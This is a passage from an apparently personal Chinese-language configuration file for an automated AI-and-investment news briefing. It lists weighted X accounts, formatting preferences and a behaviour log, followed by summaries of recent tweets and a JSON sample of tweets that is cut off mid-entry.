3万星热门项目作者,B站内容参考价值高 | +| @berryxia | Berryxia | 高 | AI工具、系统提示词、设计美学 | 新增;提示词研究深度高,和用户兴趣直接对齐 | +| @Pluvio9yte | 雪踏乌云 | 高 | 氛围编程、AI编程技巧、产品出海 | 新增;大厂开发者视角,实操经验丰富 | +| @liuliu | 刘进 | 中 | VC投资、华语科技圈 | 技术洞见高质量,但更新频率偏低 | +| @CuiMao | CuiMao | 中 | 深度学习、NVIDIA生态、ComfyUI工作流 | 新增;技术深度强,ComfyUI方向与AI工具主线相关 | +| @0xAA_Science | 0xAA | 中 | Web3教育、开源项目、AI+Web3交叉 | 新增;北大计算机博士,WTF Academy发起人,技术可信度高;偏Web3但有AI视角 | + +#### 华语圈 · 独立创作者 / 产品人 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @dingyi | Ding | 中 | 独立产品、SaaS工具、产品设计 | 新增;SaasPick/TopFeed作者,全网15万粉,出海产品实战参考 | +| @GoSailGlobal | Jason Zhu | 中 | SaaS出海、AI资讯、Agent资源站 | 新增;独立开发者,搭建AI Agent聚合资源站,出海视角有参考价值 | +| @frxiaobei | 凡人小北 | 中 | AI战略咨询、AIGC商业落地 | 新增;商业+战略顾问背景,关注真实商业场景的AI落地,偏B端视角 | +| @gkxspace | 余温 | 中 | AI产品商业化、从0到1创业 | 新增;05年连续创业者,已有AI项目七位数营收,创业实战参考价值高 | +| @Stv_Lynn | Steven Lynn | 中 | 科技播客、AI社区活动 | 新增;FirstLabAI播客主持人+Crazy Saturday主办者,华语AI圈社交节点 | +| @chuxiaeth | 初夏 | 中 | AI学习分享、个人成长 | 新增;Cursor资助创作者,内容质量待观察,初设中权重 | + +#### 华语圈 · Crypto / 链上(低权重,仅关注AI交叉内容) + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @二级炒家 | 二级炒家 | 高 | A股宏观、市场判断 | 和投资主线直接相关;⚠️ 中文handle,需X API | +| @wolfyxbt | 杀破狼 | 低 | 氛围编程、链上数据、Meme币 | 新增;表达一针见血,但主线偏Meme币;仅关注AI编程相关内容 | +| @runes_leo | Leo | 低 | 比特币生态、链上量化 | 新增;AI+Crypto独立建设者,主线偏比特币生态,AI交叉内容才关注 | +| @oranges | 比特币橙子 | 低 | 比特币、AI工具(OwlClawHub) | 新增;搭建了AI智能体工具集,但主业是加密投资;仅关注AI工具相关 | +| @realNyarime | 奶昔 | 低 | eSIM技术、社区运营 | 新增;主业eSIM和奶昔社区,与简报主线相关性低;暂设低权重观察 | + +--- + +## 三、内容类型偏好 + +### ✅ 优先展示 +- **可操作的项目/工具**:有 GitHub 链接、可以立刻尝试的内容 +- **AI 编程实践**:提示词技巧、Agent 搭建、工作流分享 +- **行业方向判断**:顶级 VC 或创始人对未来的预测和押注 +- **宏观与投资叙事**:A股、美股科技板块的结构性变化 +- **中文圈独特视角**:英文圈没有的本地化洞见 + +### ❌ 降低优先级 +- 纯政治观点(和 AI/投资无关的) +- 加密货币炒作、价格预测类 +- 互相转发的无实质内容互动 +- 重复已知信息的科普 + +--- + +## 四、简报格式偏好 + +``` +📰 AI & 投资日报 · [日期] + +【30秒总览】一句话概括今日主旋律 + +━━━━━━━━━━━━━ +🔥 今日主题卡片(2~3个) +每张卡片包含: + - 主题标签 + - 核心洞见(1~2句) + - 来源账号 + - 你可以做什么(可操作建议) + +━━━━━━━━━━━━━ +⚡ 快速扫读(剩余有价值内容) + +━━━━━━━━━━━━━ +🀄 华语圈单独板块 + +━━━━━━━━━━━━━ +📌 本期可以跟着做的事 + +━━━━━━━━━━━━━ +😴 今日无新内容的账号 +``` + +**语言**:中文总结为主,保留有分量的英文原句 +**长度**:10分钟内可以读完 +**主题卡片数量**:每日 2~3 个,宁缺毋滥 + +--- + +## 五、行为日志 +> 由 Claude 根据你的互动自动追加。记录有意义的偏好信号,作为未来权重调整的依据。 + +| 日期 | 行为 | 内容摘要 | 影响 | +|------|------|----------|------| +| 2026-04-26 | 初始配置建立 | 人工设定初始权重 | — | +| 2026-04-28 | 账号列表核查优化 | Web搜索核查全部33个账号的真实性与活跃度 | 修正7处、新增5个、删除7个 | +| 2026-04-29 | 批量新增华语圈博主 | 添加Cursor官方账号 + 15位Cursor资助中文区创作者 + 1位用户自荐(@chuxiaeth) | 总账号数从33增至51;华语圈从3扩充至20;新增AI编程/工具高权重博主4个 | + +--- + +## 六、待解决的遗留问题 +> 系统尚未实现的功能,记录在此,后续迭代时参考。 + +- [ ] 账号内容类型自动分类(通用知识型 vs 项目介绍型),不同类型反馈权重不同 +- [ ] 点踩行为如何自动写回本文件并影响下次抓取权重 +- [ ] 新账号发现与加入机制(何时、如何引入新的关注对象) +- [ ] 账号沉默超过 N 天自动降权的规则实现 +- [ ] 新加入的华语圈账号经过 2 周观察后,根据实际内容质量调整权重 + +上下文(摘要): +# X平台关注列表推文汇总 + +**生成日期**: 2026-04-29T10:59:43.472886+00:00 +**数据来源**: Nitter RSS 订阅 +**时间范围**: 最近7天 +**账号总数**: 44 | **成功获取**: 37 | **推文总数**: 513 + +--- + +### ✅ @karpathy — Andrej Karpathy(2 条) + +**[2026-04-27T21:34:34+00:00]** +> RT by @karpathy: New work with @AlecRad and @DavidDuvenaud: Have you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. Vintage models sh… +[原文链接](https://x.com/karpathy/status/2048878495539843211) + +**[2026-04-22T16:00:05+00:00]** +> RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see. @eddiejiao_obj, @drewocarr and I built… +[原文链接](https://x.com/karpathy/status/2046982383430496444) + +--- + +### ✅ @sama — Sam Altman(20 条) + +**[2026-04-29T02:31:21+00:00]** +> R to @sama: at this point @ajambrosino is mogmogging enjoy the next few updates +[原文链接](https://x.com/sama/status/2049315574120055054) + +**[2026-04-29T02:27:13+00:00]** +> Image +[原文链接](https://x.com/sama/status/2049314532892475791) + +**[2026-04-28T21:37:05+00:00]** +> Image +[原文链接](https://x.com/sama/status/2049241518540808440) + +**[2026-04-28T21:12:19+00:00]** +> wow y'all love 5.5 we should think of something nice to do to celebrate! +[原文链接](https://x.com/sama/status/2049235284655780000) + +**[2026-04-28T05:28:43+00:00]** +> RT by @sama: Don't just reset Codex rate limits for fun, it costs money. Don't just reset Codex rate limits for fun, it costs money. ... but the vibes are good ... I have reset Codex rate limits for … +[原文链接](https://x.com/sama/status/2048997818673537399) + +**[2026-04-28T02:52:46+00:00]** +> RT by @sama: We will ship again this week. Codex has achieved escape velocity and will keep improving rapidly. +[原文链接](https://x.com/sama/status/2048958572562710550) + +**[2026-04-27T23:55:12+00:00]** +> codex with the $20 plan is a really good deal +[原文链接](https://x.com/sama/status/2048913887614115857) + +**[2026-04-27T23:42:41+00:00]** +> we love our users +[原文链接](https://x.com/sama/status/2048910739784826966) + +**[2026-04-27T13:24:26+00:00]** +> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr… +[原文链接](https://x.com/sama/status/2048755148361707946) + +**[2026-04-27T13:09:30+00:00]** +> this is so good: https://paulgraham.com/kids.html +[原文链接](https://x.com/sama/status/2048751392031203544) + +**[2026-04-27T00:05:31+00:00]** +> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful. +[原文链接](https://x.com/sama/status/2048554097985593849) + +**[2026-04-26T23:59:53+00:00]** +> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/ +[原文链接](https://x.com/sama/status/2048552677433643427) + +**[2026-04-26T15:46:41+00:00]** +> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents) +[原文链接](https://x.com/sama/status/2048428561481265539) + +**[2026-04-26T15:37:00+00:00]** +> "post-AGI, no one is going to work and the economy is going to collapse" "i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret… +[原文链接](https://x.com/sama/status/2048426122854228141) + +**[2026-04-26T02:15:19+00:00]** +> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day +[原文链接](https://x.com/sama/status/2048224374264885396) + +**[2026-04-25T22:20:08+00:00]** +> how can they write code so fast?! +[原文链接](https://x.com/sama/status/2048165186482389253) + +**[2026-04-25T22:01:18+00:00]** +> R to @sama: (and we will fix the former) +[原文链接](https://x.com/sama/status/2048160448340767038) + +**[2026-04-25T22:01:08+00:00]** +> we still get looksmaxxed on frontend a little but we IQmog hard now +[原文链接](https://x.com/sama/status/2048160404376105179) + +**[2026-04-25T15:31:08+00:00]** +> 5.5 is so earnest "little engine that could" energy +[原文链接](https://x.com/sama/status/2048062261584077149) + +**[2026-04-24T23:41:49+00:00]** +> this was a good week. proud of the team. happy building! +[原文链接](https://x.com/sama/status/2047823357635354814) + +--- + +### ✅ @DarioAmodei — Dario Amodei(0 条) + +--- + +### ✅ @AravSrinivas — Aravind Srinivas(9 条) + +**[2026-04-28T16:05:11+00:00]** +> RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad. Comet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet al… +[原文链接](https://x.com/AravSrinivas/status/2049157990604025896) + +**[2026-04-28T15:38:49+00:00]** +> R to @AravSrinivas: reddit.com/r/GeminiAI/commen… +[原文链接](https://x.com/AravSrinivas/status/2049151356985040934) + +**[2026-04-28T15:38:28+00:00]** +> A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes. +[原文链接](https://x.com/AravSrinivas/status/2049151268606894310) + +**[2026-04-24T21:24:24+00:00]** +> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr… +[原文链接](https://x.com/AravSrinivas/status/2047788775468908840) + +**[2026-04-24T19:03:21+00:00]** +> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y… +[原文链接](https://x.com/AravSrinivas/status/2047753276888854595) + +**[2026-04-24T18:44:19+00:00]** +> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers. +[原文链接](https://x.com/AravSrinivas/status/2047748486767272243) + +**[2026-04-23T02:46:57+00:00]** +> RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers. +[原文链接](https://x.com/AravSrinivas/status/2047145172337836139) + +**[2026-04-22T18:28:20+00:00]** +> We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. Unlike our previous post trained models, this model has been trained to be good at search and tool c… +[原文链接](https://x.com/AravSrinivas/status/2047019688920756504) + +**[2026-04-22T18:15:16+00:00]** +> RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers. Our SFT + RL pipeline improves search, citation quality, instruction following, an… +[原文链接](https://x.com/AravSrinivas/status/2047016400292839808) + +--- + +### ✅ @AndrewYNg — Andrew Ng(1 条) + +**[2026-04-27T15:58:13+00:00]** +> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to… +[原文链接](https://x.com/AndrewYNg/status/2048793852702757151) + +--- + +### ✅ @cursor_ai — Cursor(8 条) + +**[2026-04-24T19:48:34+00:00]** +> R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download +[原文链接](https://x.com/cursor_ai/status/2047764656165646786) + +**[2026-04-24T19:48:33+00:00]** +> R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes. A single agent session can now target a reusable workspace made of multiple folders. +[原文链接](https://x.com/cursor_ai/status/2047764654760632725) + +**[2026-04-24T19:48:33+00:00]** +> R to @cursor_ai: Another way to parallelize work is with new and improved worktrees in the agents window. Run isolated tasks in the background across different branches. When you're ready to test cha… +[原文链接](https://x.com/cursor_ai/status/2047764652977958938) + +**[2026-04-24T19:48:33+00:00]** +> Introducing /multitask in the new Cursor 3 interface. Cursor can now run async subagents to parallelize your requests instead of adding them to the queue. For already queued messages, you can ask Cur… +[原文链接](https://x.com/cursor_ai/status/2047764651363180839) + +**[2026-04-24T18:28:47+00:00]** +> R to @cursor_ai: More on CursorBench: http://cursor.com/blog/cursorbench +[原文链接](https://x.com/cursor_ai/status/2047744580280561948) + +**[2026-04-24T18:28:47+00:00]** +> GPT-5.5 is now available in Cursor! It's currently the top model on CursorBench at 72.8%. We've partnered with OpenAI to offer it for 50% off through May 2. +[原文链接](https://x.com/cursor_ai/status/2047744579127185843) + +**[2026-04-22T17:12:09+00:00]** +> R to @cursor_ai: Add Cursor to Slack: http://cursor.com/api/install-slack-app +[原文链接](https://x.com/cursor_ai/status/2047000519043141766) + +**[2026-04-22T17:12:09+00:00]** +> Mention @​Cursor to kick off tasks in Slack and see updates of its work streaming in real time. Cursor uses context in the thread and broader channels to create a PR for you to review and ship. +[原文链接](https://x.com/cursor_ai/status/2047000517751288303) + +--- + +### ✅ @ylecun — Yann LeCun(20 条) + +**[2026-04-28T21:36:28+00:00]** +> RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 ! As my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers: - EB-JEPA https://github… +[原文链接](https://x.com/ylecun/status/2049241361266684288) + +**[2026-04-28T01:05:42+00:00]** +> RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc In just one year, it has be… +[原文链接](https://x.com/ylecun/status/2048931628995510596) + +**[2026-04-27T21:38:46+00:00]** +> RT by @ylecun: “Calling Trump a fascist incites political violence” Here’s a compilation of Trump calling his opponents fascists +[原文链接](https://x.com/ylecun/status/2048879552022130882) + +**[2026-04-27T21:06:29+00:00]** +> RT by @ylecun: He is right +[原文链接](https://x.com/ylecun/status/2048871429681148028) + +**[2026-04-27T14:59:33+00:00]** +> RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 ye… +[原文链接](https://x.com/ylecun/status/2048779086168838610) + +**[2026-04-27T12:27:04+00:00]** +> RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the ne… +[原文链接](https://x.com/ylecun/status/2048740712556933170) + +**[2026-04-27T10:23:22+00:00]** +> RT by @ylecun: AI has had one safest technology roll-outs in history. Read that again, because it's a fact. It's used by billions with a tiny fraction of a percent of actual problems. And yet it's se… +[原文链接](https://x.com/ylecun/status/2048709585360367651) + +**[2026-04-27T06:49:24+00:00]** +> RT by @ylecun: Image +[原文链接](https://x.com/ylecun/status/2048655735412650355) + +**[2026-04-26T23:40:02+00:00]** +> RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor au… +[原文链接](https://x.com/ylecun/status/2048547683112046771) + +**[2026-04-26T19:19:22+00:00]** +> RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. The result, predictably, is… +[原文链接](https://x.com/ylecun/status/2048482084646240560) + +**[2026-04-26T18:31:11+00:00]** +> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,… +[原文链接](https://x.com/ylecun/status/20484699566274685 + +推文样本(JSON): +[{"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T10:38:03+00:00", "title": "Anthropic ships changelogs. OpenAI ships vibes.", "url": "https://x.com/runes_leo/status/2049438052310020226"}, {"handle": "bozhou_ai", "name": "泊舟", "published_at": "2026-04-29T10:33:21+00:00", "title": "Warp 昨晚开源了。\n\nGitHub_Daily 写的时候是 34000 Star,刚去看已经 38k+。\n\nWarp 不只是个终端,定位是 ADE(Agentic Development Environment)。内置自家编码 Agent,也支持接入 Claude Code、Codex、Gemini CLI、Kimi CLI 这些外部 CLI Agent,一个窗口里啥都能跑。\n\n几个观察:\n\n第一,协议是 AGPL,不是 MIT。意思是个人爱怎么用怎么用,但你要拿去做云服务卖钱,整个改动都得开源。MongoDB、Redis 那条防白嫖的老路。\n\n第二", "url": "https://x.com/bozhou_ai/status/2049436870963085429"}, {"handle": "bozhou_ai", "name": "泊舟", "published_at": "2026-04-29T10:32:33+00:00", "title": "MIT 静悄悄放了 12 本 AI 教材出来,全部免费。同样内容去美国念个学位,学费要 5 万美元。\n\ncyrilXBT 整理的清单,分四类。\n\n【基础】\n\n1. Foundations of Machine Learning(Mohri 等):经典 ML 教材,PAC 学习理论到核方法\nhttps://cs.nyu.edu/~mohri/mlbook/\n\n2. Mathematics for Machine Learning:ML 背后的线代、概率、微积分\nhttps://mml-book.github.io/\n\n3. Probabilistic Ma", "url": "https://x.com/bozhou_ai/status/2049436668663390575"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T09:40:13+00:00", "title": "Claude Code 加了 push 通知,任务跑完手机叫你,让你能从终端走开。\n\n但通知再快也是要人读的。我并不想读。\n\n我有几个 TG 频道接监控,策略告警/异常/系统/信号分开收,每天未读消息几十条。但还是要我自己打开看:是真需要动手处理,还是又一次正常状态监控。这跟没提醒区别不大。\n\n懒人的真需求不是\"通知更快\",是 AI 替我读完那条告警,归类、判断、给一行结论:这条 P0 现在去改 / 这条系统自愈了别管 / 这条留到周日复盘。\n\n然后我只看结论那一行,拍板即可。\n\n工具厂都在卷\"通知到手机更快\",但没人卷\"替你读完\"。这才是 worker", "url": "https://x.com/runes_leo/status/2049423498494566836"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-29T09:38:53+00:00", "title": "这个动效设计 skills 真好!\n\nnpx skills add jakubantalik/transitions-dev", "url": "https://x.com/dingyi/status/2049423162933395583"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T09:35:28+00:00", "title": "国内自媒体真的赢麻了,随便说点deepseek V4 的好话就大几万播放,要是再加点黄仁勋彻底失败,美国AI走向灭亡,要是再懂点的,分析下中美能源对比,在喊一句华为取代英伟达成为全球霸主彻底改写世界AI格局,这视频直接奔着几十万播放去的。", "url": "https://x.com/CuiMao/status/2049422304338444773"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T09:13:21+00:00", "title": "R to @paulg: Why do I assume his successors will be more principled? Partly because almost everyone is, even in politics. And partly because if they aren't, it won't matter much who's president, because the country will have entered a phase of permanent decline.", "url": "https://x.com/paulg/status/2049416736806449649"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T09:11:10+00:00", "title": "R to @paulg: He'll leave the opposite legacy. His more principled successors will have a harder time getting things done, because of the walls everyone has built to protect against Trump's overreach.", "url": "https://x.com/paulg/status/2049416188568949159"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T09:09:13+00:00", "title": "Trump's bullying only works (and only temporarily at that) because he's taking advantage of the high-trust customs and relationships established by more principled predecessors.", "url": "https://x.com/paulg/status/2049415696694587729"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T09:07:13+00:00", "title": "做了 2 个月的事:把 GitHub 上每一个 Claude Skill / MCP server / 开源 Agent 工具都索引下来\n\n数据库现在 67,196 个项目\n\n跑了一遍分布分析,结果让我自己愣了 30 秒:\n\n- 基尼系数 0.983(破 AppStore、npm、YouTube 纪录)\n- 54.1% 的项目是 0 star——不是「少 star」,是 0\n- Top 1% 占走了 83% 的 stars\n- 2026 年 3 月单月新增 27,720 个项目,是 2024 月均的 45 倍\n\n写了一篇 1800 字英文长文讲完所有发现", "url": "https://x.com/GoSailGlobal/status/2049415194372342164"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T08:43:53+00:00", "title": "R to @realNyarime: 虽然原帖并未提及中国联通,但帖主在评论区提到“联通玩不起”,也害怕被运营商“穿小鞋”因此仅披露运营商未经许可入室查设备,因小区监控不全面而无法取证", "url": "https://x.com/realNyarime/status/2049409325098238125"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T08:41:13+00:00", "title": "据xhs用户「A信通网络」爆料,长沙联通查PCDN,摸着窗户上的钥匙进门,前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。\n\n原文如下:我们突然收到公司的电话,说我办的业务出问题了。还以为啥大事。我赶紧跑过来,发现客户家里的门开着,以为是客户自己在家里,结果客户并不在家。 [坏笑R]前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。然后我和我们3个领导是最后来的。 客户场景是老小区-1楼一个房间里,拉了8条商务专线+1条商务专线带的二宽。\n那么,这个地方是否有问题呢?我认为是没问题的。因为", "url": "https://x.com/realNyarime/status/2049408651660755063"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:25+00:00", "title": "R to @GoSailGlobal: 3️⃣ 可以把做的张小龙Agent拉到群组\n\n大家可以圆桌讨论,简单易用", "url": "https://x.com/GoSailGlobal/status/2049408452079046944"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:22+00:00", "title": "R to @GoSailGlobal: 2️⃣ 每个agent可以GUI自定义大模型、skill、memory\n\n还可以支持第三方模型", "url": "https://x.com/GoSailGlobal/status/2049408436597899361"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:18+00:00", "title": "R to @GoSailGlobal: 1️⃣ 使用google邮箱登陆\n\n可下载本地软件(最好下载本地) or 网页版使用", "url": "https://x.com/GoSailGlobal/status/2049408421167005763"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:14+00:00", "title": "被一个二维码拉进了一个 IM 内测群\n\n群里坐着 Codex / Claude Code 实例、张小龙 agent,再加几个真人,大家一起讨论选题\n\nagent 先梳调性,再列大纲,真人在旁边补刀\n\n我做 AgentSkillsHub 看了 67,000+ 个 agent 项目,第一次见有人把 agent 当 IM 里的「一等公民」:不是 bot、不是插件,是好友名单里的成员\n\n它叫 Bloome(http://www.bloome.im),前 Kimi 核心 PM 做的\n\n现在秘密内测中,大家都在看 agent network 该长什么样:一群人,一群", "url": "https://x.com/GoSailGlobal/status/2049408403240571320"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T08:20:26+00:00", "title": "兄弟们,搞3D的直接冲🤩🤩🤩\n\nClaude上线了Blender MCP连接器,\n自然语言直接操控Blender的Python API,\n调场景、批量改物体、写自定义工具,不用会一行代码,\n\n我之前在Blender写个批量脚本至少折腾半小时,\n现在一句话就搞定了,\n\n更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商,\n这波是总共9个创意工具连接器一起上线", "url": "https://x.com/Pluvio9yte/status/2049403423813140571"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T08:16:00+00:00", "title": "刚学习完罗福莉老师这场 3.5h 访谈发了中文解读,\n转头就刷到她团队在送 100T tokens grant,立马提交申请。\n\n表单做得对中文 builder 极友好:\n工具栏 OpenClaw / Claude Code / Codex 排前三\n模型可勾 Claude / MiMo / DeepSeek / 豆包 / MiniMax 等国产\n\n下一步:把 MiMo V2.5 接进现有 Claude Code 工作流,\n做横向对照实测出公开内容。(如果申请成功的话😆)\n\n听 → 写 → 用 → 传播,一个闭环。\n\n申请入口:http://100t.xi", "url": "https://x.com/runes_leo/status/2049402305217241384"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:55:14+00:00", "title": "Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!", "url": "https://x.com/CuiMao/status/2049397079177592925"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:44:33+00:00", "title": "x.com/i/article/204921670329…", "url": "https://x.com/CuiMao/status/2049394392776290573"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T07:15:58+00:00", "title": "裤袜是裤子还是袜子?", "url": "https://x.com/realNyarime/status/2049387196311105556"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:09:24+00:00", "title": "😄", "url": "https://x.com/CuiMao/status/2049385544577438121"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:02:18+00:00", "title": "哈哈。主页刷到很多小朋友拿到了字节的 offer ,恭喜啊,我当时进字节的第一天,乌云遮天,大雨滂沱,电闪雷鸣,预示着一个伟大的产品经理即将孕育而生。😎😎,加油!,每天都是 Day 1", "url": "https://x.com/CuiMao/status/2049383757535490257"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-29T06:32:45+00:00", "title": "看别人天天发商单,还特么疯狂涨粉。\n\n难受了☹️ \n\n是时候,我也要让甲方爸爸来几个单了!\n\n助我一臂之力了嘿嘿😁\n\n在线等啊…", "url": "https://x.com/berryxia/status/2049376324444410138"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T06:19:31+00:00", "title": "Cybertruck", "url": "https://x.com/elonmusk/status/2049372990870290940"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T06:15:09+00:00", "title": "x.com/i/article/204902031072…", "url": "https://x.com/runes_leo/status/2049371895267774715"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T06:05:35+00:00", "title": "Congrats!", "url": "https://x.com/elonmusk/status/2049369485459832951"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T06:04:54+00:00", "title": "呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。", "url": "https://x.com/CuiMao/status/2049369313547800804"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T06:04:42+00:00", "title": "RT by @elonmusk: Full circle moment: paying for @Starlink with @XMoney 🤝", "url": "https://x.com/elonmusk/status/2049369264914903143"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T06:02:06+00:00", "title": "用 GPT Image 2 赚钱,你想到几种方式?\n\n我整理了5种,每种都有提示词,拿走能用\n\n但还有一种方式不用自己会出图也能赚!!\n\n有人进货四分钱,卖两毛,自己一张图都不出\n\n闲鱼上已经有人在跑了\n\n其余 5 种看图\n\n完整提示词加自动化流程,请看引用文章👇", "url": "https://x.com/lxfater/status/2049368609193926810"}, {"handle": "naval", "name": "Naval Ravikant", "published_at": "2026-04-29T06:01:47+00:00", "title": "\"Savings Tax.\"", "url": "https://x.com/naval/status/2049368528445403351"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T05:57:10+00:00", "title": "RT by @elonmusk: Elon Musk on AI during the OpenAI trial:\n\n\"It (AI) could make us more prosperous, but it could also kill us all. We want to be in a Gene Roddenberry movie, like Star Trek, not so much a James Cameron movie, like Terminator.\n\nHe then elaborated by comparing AI tra", "url": "https://x.com/elonmusk/status/2049367366824305013"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T05:32:52+00:00", "title": "拼接两段 15s的忠犬八公动漫视频\n\n很不错哈", "url": "https://x.com/GoSailGlobal/status/2049361252804427850"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-29T04:57:00+00:00", "title": "OpenAI may no longer be a nonprofit but it continues to be—and may always be—a “never made a profit”", "url": "https://x.com/GaryMarcus/status/2049352224547975422"}, {"handle": "chuxiaeth", "name": "初夏", "published_at": "2026-04-29T04:52:50+00:00", "title": "🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯\n\n策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊\n\nTria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=mindo\n\n排名规则分三块:\n1️⃣ DEX 交易量\n2️⃣ 信用卡办理加消费\n3️⃣ 创作者影响力\n我的打法是主攻第三项,前两项用最小成本蹭基础分,集中火", "url": "https://x.com/chuxiaeth/status/2049351176433623539"}, {"handle": "naval", "name": "Naval Ravikant", "published_at": "2026-04-29T04:45:11+00:00", "title": "R to @naval: Apple: http://apple.co/4cF5VWZ\n\nSpotify: http://open.spotify.com/episode/5C1aTaJwlpkGC7Lj0cqDrx\n\nYouTube: http://youtu.be/hTdSU7q5WCo\n\nTranscript: http://nav.al/code\n\n—\n\nPresented by AngelList: http://angellist.com/podcast", "url": "https://x.com/naval/status/2049349252112089553"}, {"handle": "naval", "name": "Naval Ravikant", "published_at": "2026-04-29T04:45:10+00:00", "title": "New podcast on vibe coding - A Return to Code.\n\nA Return to Coding 00:20\n\nThe Personal App Store 03:17\n\nVibe Coding Is a Video Game with Real-World Rewards 06:22\n\nPure Software Is Uninvestable 10:33\n\nA Place for Each Model 14:22\n\nAI Is Eager to Please 17:57\n\nWhy Math and Coding? ", "url": "https://x.com/naval/status/2049349249905951175"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T04:39:21+00:00", "title": "未来属于设计 测评 和 运营", "url": "https://x.com/Pluvio9yte/status/2049347785456316549"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T04:07:44+00:00", "title": "Matt Pocock 的 Skill 框架 · 跟其他三家的差异\n\n项目链接:http://github.com/mattpocock/skills · 38K stars · MIT · 